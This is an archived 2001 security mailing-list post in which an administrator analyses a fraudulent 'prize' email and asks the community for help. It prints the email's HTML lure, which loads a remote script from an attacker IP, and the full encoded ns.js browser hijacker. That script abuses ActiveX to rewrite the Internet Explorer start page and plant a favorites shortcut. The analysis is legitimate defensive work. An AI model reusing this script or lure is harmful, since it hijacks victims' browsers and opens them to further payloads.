(-; A couple of days late ---| -----------------------------| Add info- I was able to get a good scan of the referenced "ns.js" file from nai, turns out to be js/seeker.gen. So it is basically a established virus. But it's delivery method is different. The one thing however that I would raise a concern about, is if the web site operator succeeded in creating the reg key that sets the default page to his site. They can then run code of their choice the next time someone launches their browser, be it IE or Netscape. Be it downloading a trojan or just simply crashing their machine. Turns out to be nothing major in the scheme of things. -----Original Message----- From: Michael B. Morell [mailto:MMorellat_private] Sent: Tuesday, November 06, 2001 12:15 PM To: incidentsat_private Subject: E-mail with ties to possible malicious website A suspicious e-mail has been received by my network that I believe is worth opening up to the community for further scrutiny. I appreciate any further insight that anyone else might be able to shed. The e-mails have been submitted to sarc and nai for review. Sarc has already said that the ns.js is not a virus. Nai has yet to respond. An e-mail has also been sent to the host-master responsible for the mail server that was used to relay the e-mail. I have not yet sent an e-mail to the ISP of the referenced IP in the e-mail. I have looked into the e-mail extensively and have not been able to find any clear evidence of a destructive payload. However it is it's delivery method and what it appears to try to do that is cause for my concern. The e-mail itself is HTML based and relies on social engineering to coerce the end user into proceeding. <!--Begin HTML--> <html> <head> <title>Prize Collection</title> </head> <body bgcolor="#FFFFFF" text="#000000" onload=init();> <p>Dear Sir/Madam.</p> <p>I am contacting you on behalf of the "Online Bank Draw" corporation.<br> A prize won by you on the 16th of August 2001 (by e-mail submission) is ready to be collected.<br> <br> Please <a href="http://64.57.164.73/agus2000/ns/" target="_blank">read this page for further information</a>.</p> <p><br> Yours Sincerely.<br> Mike Ranson.<br> USCT Internet Postal Delivery.<br> <script language="JScript.Encode" src="http://64.57.164.73/agus2000/ns.js"></script> </p> </body> </html> <!--End HTML--> You will notice some tell tale signs that this is a fraudelent e-mail. 1. The Lack of a subject 2. A claim of prize money 3. A odd name for a company "Online Bank Draw" 4. signed by the USCT Internet Postal Delivery (never heard of them) A further investigation into the headers will also reveal that the sender does not have a Valid E-mail address nor can you trace it's footprint back. <!--Begin Headers, obvious substitutions of names and Ips' until relayed mail server hostmaster confirms authorized use of server--) Received: from ADomain.com (mail.ADomain.com [xxx.xxx.xxx.xxx]) by mail.OurDomain.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id V93AVXYX; Mon, 5 Nov 2001 18:36:34 -0500 Received: from mail.ADomain.com [xxx.xxx.xxx.xxx] by ADomain.com with ESMTP (SMTPD32-6.06) id A27E9B6019E; Mon, 05 Nov 2001 18:36:30 -0500 From: Mike Ranson - USCT Internet Postal Delivery Date: Tue, 06 Nov 2001 07:34:13 To: ReplacedUserNameHere Subject: MIME-Version: 1.0 Content-Type: multipart/related; boundary="----=_NextPart_FPJUZAJHEK" Content-Transfer-Encoding: 7bit Message-ID: PM20007:34:13 AM This is an HTML email message. If you see this, your mail client does not support HTML messages. ------=_NextPart_FPJUZAJHEK Content-Type: text/html;charset="iso-8859-1" Content-Transfer-Encoding: 7bit ------=_NextPart_FPJUZAJHEK-- <!--End Headers--> Once a user clicks on the link in the e-mail. Their screen is flooded with opened windows that go to adult websites (aka porn). It was unsure whether or not this was to hide further action of the script or if that was the intended payload. After some searching on the infected system. I was unable to find any obvious system file changes/additions. But I was able to find the ns.js file that was referenced in the source. This was found in the temporary Internet files folder. By reading the script file I noticed several things (granted I am not the best at JavaScripting, which is why I am submitting it here). From what I can tell it checks to see if the clsid for netscape/IE/wsh exist and if they do attempt to write a reg key for the current user. The path it calls is based on the Win2k users path. <!--Begin ns.js opened in notepad--> <!-- document.write(unescape("%3Cscript%20language%3D%22JavaScript%22%3E%0D%0A%09 document.write%28%22%3CAPPLET%20HEIGHT%3D0%20WIDTH%3D0%20code%3Dcom.ms.activ eX.ActiveXComponent%3E%3C/APPLET%3E%22%29%3B%0D%0A%0D%0A%09if%20%28navigator .appName%20%3D%3D%20%27Netscape%27%29%20var%20language%20%3D%20navigator.lan guage%3B%0D%0A%09else%20var%20language%20%3D%20navigator.browserLanguage%3B% 0D%0A%0D%0A%09function%20AddFavLnk%28loc%2C%20DispName%2C%20SiteURL%29%20%7B %0D%0A%09%20%20var%20Shor%20%3D%20Shl.CreateShortcut%28loc%20+%20%22%5C%5C%2 2%20+%20DispName%20+%22.URL%22%29%3B%0D%0A%09%20%20Shor.TargetPath%20%3D%20S iteURL%3B%0D%0A%09%20%20Shor.Save%28%29%3B%0D%0A%09%7D%0D%0A%0D%0A%09functio n%20f%28%29%20%7B%0D%0A%09%20%20try%20%7B%0D%0A%20%20%20%20%20%20a1%3Ddocume nt.applets%5B0%5D%3B%0D%0A%20%20%20%20%20%20a1.setCLSID%28%22%7BF935DC22-1CF 0-11D0-ADB9-00C04FD58A0B%7D%22%29%3B%0D%0A%20%20%20%20%20%20a1.createInstanc e%28%29%3B%0D%0A%20%20%20%20%20%20Shl%20%3D%20a1.GetObject%28%29%3B%0D%0A%20 %20%20%20%20%20a1.setCLSID%28%22%7B0D43FE01-F093-11CF-8940-00A0C9054228%7D%2 2%29%3B%0D%0A%20%20%20%20%20%20a1.createInstance%28%29%3B%0D%0A%20%20%20%20% 20%20FSO%20%3D%20a1.GetObject%28%29%3B%0D%0A%20%20%20%20%20%20a1.setCLSID%28 %22%7BF935DC26-1CF0-11D0-ADB9-00C04FD58A0B%7D%22%29%3B%0D%0A%20%20%20%20%20% 20a1.createInstance%28%29%3B%0D%0A%20%20%20%20%20%20Net%20%3D%20a1.GetObject %28%29%3B%0D%0A%20%20%20%20%20%20try%20%7B%0D%0A//%20%20%20%20%20%20%20%20if %20%28document.cookie.indexOf%28%22Chg%22%29%20%3D%3D%20-1%29%20%7B%0D%0A//% 20%20%20%20%20%20%20%20%20%20var%20expdate%20%3D%20new%20Date%28%28new%20Dat e%28%29%29.getTime%28%29%20+%20%2824%20*%2060%20*%2060%20*%201000%20*%2090%2 9%29%3B%0D%0A//%20%20%20%20%20%20%20%20%20%20document.cookie%3D%22Chg%3Dgene ral%3B%20expires%3D%22%20+%20expdate.toGMTString%28%29%20+%20%22%3B%20path%3 D/%3B%22%0D%0A%20%20%20%20%20%20%20%20%20%20if%20%28%21language.indexOf%28%2 7es%27%29%20%3E-1%29%20Shl.RegWrite%20%28%22HKCU%5C%5CSoftware%5C%5CMicrosof t%5C%5CInternet%20Explorer%5C%5CMain%5C%5CStart%20Page%22%2C%20%22http%3A//6 4.57.164.73/agus2000/jstarter/%22%29%3B%0D%0A//%20%20%20%20%20%20%20%20%20%2 0var%20expdate%20%3D%20new%20Date%28%28new%20Date%28%29%29.getTime%28%29%20+ %20%2824%20*%2060%20*%2060%20*%201000%20*%2090%29%29%3B%0D%0A//%20%20%20%20% 20%20%20%20%20%20document.cookie%3D%22Chg%3Dgeneral%3B%20expires%3D%22%20+%2 0expdate.toGMTString%28%29%20+%20%22%3B%20path%3D/%3B%22%0D%0A%20%20%20%20%2 0%20%20%20%20%20var%20WF%2C%20Shor%2C%20loc%3B%0D%0A%20%20%20%20%20%20%20%20 %20%20WF%20%3D%20FSO.GetSpecialFolder%280%29%3B%0D%0A%20%20%20%20%20%20%20%2 0%20%20if%20%28language.indexOf%28%27es%27%29%20%3E-1%29%20loc%20%3D%20WF%20 +%20%22%5C%5Cfavoritos%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%20else%20if%20 %28language.indexOf%28%27de%27%29%20%3E-1%29%20loc%20%3D%20WF%20+%20%22%5C%5 Cfavoriten%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%20else%20if%20%28language. indexOf%28%27sv%27%29%20%3E-1%29%20loc%20%3D%20WF%20+%20%22%5C%5Cfavoriter%2 2%3B%0D%0A%20%20%20%20%20%20%20%20%20%20else%20if%20%28language.indexOf%28%2 7it%27%29%20%3E-1%29%20loc%20%3D%20WF%20+%20%22%5C%5Cpreferiti%22%3B%0D%0A%2 0%20%20%20%20%20%20%20%20%20else%20if%20%28language.indexOf%28%27fr%27%29%20 %3E-1%29%20loc%20%3D%20WF%20+%20%22%5C%5Cfavoris%22%3B%0D%0A%20%20%20%20%20% 20%20%20%20%20else%20if%20%28language.indexOf%28%27da%27%29%20%3E-1%29%20loc %20%3D%20WF%20+%20%22%5C%5Coversigt%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%2 0else%20loc%20%3D%20WF%20+%20%22%5C%5CFavorites%22%3B%0D%0A%20%20%20%20%20%2 0%20%20%20%20if%28%21FSO.FolderExists%28loc%29%29%20%7B%0D%0A%20%20%20%20%20 %20%20%20%20%20%20%20if%20%28language.indexOf%28%27es%27%29%20%3E-1%29%20loc %20%3D%20FSO.GetDriveName%28WF%29%20+%20%22%5C%5CDocuments%20and%20Settings% 5C%5C%22%20+%20Net.UserName%20+%20%22%5C%5CFavoritos%22%3B%0D%0A%20%20%20%20 %20%20%20%20%20%20%20%20else%20if%20%28language.indexOf%28%27de%27%29%20%3E- 1%29%20loc%20%3D%20FSO.GetDriveName%28WF%29%20+%20%22%5C%5CDocuments%20and%2 0Settings%5C%5C%22%20+%20Net.UserName%20+%20%22%5C%5Cfavoriten%22%3B%0D%0A%2 0%20%20%20%20%20%20%20%20%20%20%20else%20if%20%28language.indexOf%28%27sv%27 %29%20%3E-1%29%20loc%20%3D%20FSO.GetDriveName%28WF%29%20+%20%22%5C%5CDocumen ts%20and%20Settings%5C%5C%22%20+%20Net.UserName%20+%20%22%5C%5Cfavoriter%22% 3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20else%20if%20%28language.indexOf% 28%27it%27%29%20%3E-1%29%20loc%20%3D%20FSO.GetDriveName%28WF%29%20+%20%22%5C %5CDocuments%20and%20Settings%5C%5C%22%20+%20Net.UserName%20+%20%22%5C%5Cpre feriti%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20else%20if%20%28languag e.indexOf%28%27fr%27%29%20%3E-1%29%20loc%20%3D%20FSO.GetDriveName%28WF%29%20 +%20%22%5C%5CDocuments%20and%20Settings%5C%5C%22%20+%20Net.UserName%20+%20%2 2%5C%5Cfavoris%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20else%20if%20%2 8language.indexOf%28%27da%27%29%20%3E-1%29%20loc%20%3D%20FSO.GetDriveName%28 WF%29%20+%20%22%5C%5CDocuments%20and%20Settings%5C%5C%22%20+%20Net.UserName% 20+%20%22%5C%5Coversigt%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20else% 20loc%20%3D%20FSO.GetDriveName%28WF%29%20+%20%22%5C%5CDocuments%20and%20Sett ings%5C%5C%22%20+%20Net.UserName%20+%20%22%5C%5CFavorites%22%3B%0D%0A%20%20% 20%20%20%20%20%20%20%20%20%20if%28%21FSO.FolderExists%28loc%29%29%20%7B%0D%0 A%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%0D%0A%20%20%20%20%20%20 %20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20% 20%20%20%20%20%20%20AddFavLnk%28loc%2C%20%22START HERE%22%2C%20%22http%3A//64.57.164.73/agus2000/jstarter/%22%29%3B%0D%0A//%20 %20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20c atch%28e%29%20%7B%7D%0D%0A%09%20%20%7D%0D%0A%09%20%20catch%28e%29%20%7B%7D%0 D%0A%09%7D%0D%0A%0D%0A%09function%20init%28%29%20%7B%0D%0A%09%20%20setTimeou t%28%22f%28%29%22%2C%201000%29%3B%0D%0A%09%7D%0D%0A%0D%0A%09init%28%29%3B%0D %0A%3C/script%3E%0D%0A")); //--> <!--End ns.js--> One of my main reasons of concern is that if it is able to get the start page changed for the browser, changed to a malicious location. It would then be possible upon start up of the browser for the malicious website operator to download code of his/her choice to the system. The attempt is to write a reg key in HKCU\Software\Microsoft\InternetExplorer\MainStartPage and to set it to http//64.57.164.73/agus2000/jstarter Another concern is the reference to the FSO.GetDriveName. I am unsure if it is referencing the File System Object for any drive mappings that the system has present. If this can be confirmed/dismissed it would be helpful. Plus the mention of setting a cookie on the system and it's setting an expiration date. Thanks in advance for looking at this. Michael B. Morell Network Operations Administrator Visual Data Corporation ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Thu Nov 08 2001 - 11:57:13 PST